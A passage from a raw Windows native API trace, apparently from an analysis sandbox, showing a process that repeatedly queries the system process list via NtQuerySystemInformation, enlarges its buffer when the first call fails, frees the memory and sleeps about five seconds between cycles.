RegionSize=0xdea64*=0x10000) returned 0x0 [0192.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0192.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0192.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0192.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0192.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0192.840] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0192.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0192.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0192.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0192.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0192.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0193.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0193.159] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0193.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0193.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0193.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0193.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0193.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0193.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0193.315] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0193.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0193.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0193.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0193.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0193.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0193.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0193.717] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0193.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0193.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0193.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0193.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0193.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0193.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0193.908] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0193.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0193.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0193.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0193.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0193.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0194.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0194.027] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0194.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0194.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0194.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0194.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0194.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0194.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0194.169] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0194.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0194.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0194.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0194.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0194.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0194.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0194.363] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0194.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0194.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0194.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0194.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0194.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0194.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0194.547] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0194.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0194.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0194.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0194.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0194.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0194.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0194.952] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0194.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0194.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0194.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0194.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0194.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0195.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0195.097] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0195.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0195.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0195.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0195.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0195.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0195.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0195.228] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0195.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0195.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0195.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0195.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0195.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0195.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0195.357] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0195.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0195.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0195.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0195.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0195.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0195.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0195.529] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0195.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0195.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0195.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0195.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0195.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0195.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0195.837] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0195.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0195.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0195.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0195.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0195.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0195.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0195.955] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0195.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0195.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0195.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0195.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0195.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0196.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0196.108] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0196.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0196.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0196.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0196.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0196.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0196.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0196.528] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0196.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0196.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0196.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0196.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0196.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0196.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0196.824] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0196.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0196.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0196.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0196.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0196.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0196.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0196.943] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0196.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0196.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0196.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0196.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0196.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0197.238] 